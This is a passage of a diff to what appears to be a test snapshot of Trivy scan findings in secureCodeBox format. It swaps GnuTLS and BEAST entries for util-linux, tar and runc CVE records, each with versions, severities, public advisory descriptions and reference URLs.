+ "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://ubuntu.com/security/notices/USN-5900-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "util-linux", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-27561", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-27561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "https://github.com/opencontainers/runc/issues/3751", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-27561", + ], + }, + "category": "Vulnerability", + "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "volume mount race condition (regression of CVE-2019-19921)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2023-27561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://access.redhat.com/security/cve/CVE-2023-27561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", - "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", - ], - }, - "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", + "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", }, { "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "value": "https://github.com/opencontainers/runc/issues/3751", }, { "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", }, { "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", }, { "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", }, { "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", }, { "type": "URL", - "value": "http://eprint.iacr.org/2004/111", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", }, { "type": "URL", - "value": "http://eprint.iacr.org/2006/136", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.0", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43784", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-43784", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "https://pkg.go.dev/vuln/GO-2022-0274", + "https://www.cve.org/CVERecord?id=CVE-2021-43784", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-43784", }, { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-43784", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://pkg.go.dev/vuln/GO-2022-0274", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.2", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29162", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8090", + "https://access.redhat.com/security/cve/CVE-2022-29162", + "https://bugzilla.redhat.com/2086398", + "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "https://errata.rockylinux.org/RLSA-2022:8090", + "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "https://linux.oracle.com/cve/CVE-2022-29162.html", + "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "https://www.openwall.com/lists/oss-security/2022/05/12/1", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: incorrect handling of inheritable capabilities", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2022-29162", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "https://access.redhat.com/errata/RHSA-2022:8090", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2022-29162", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "https://bugzilla.redhat.com/2086398", }, { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8090", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-28642", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-28642", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", + "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-28642", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See 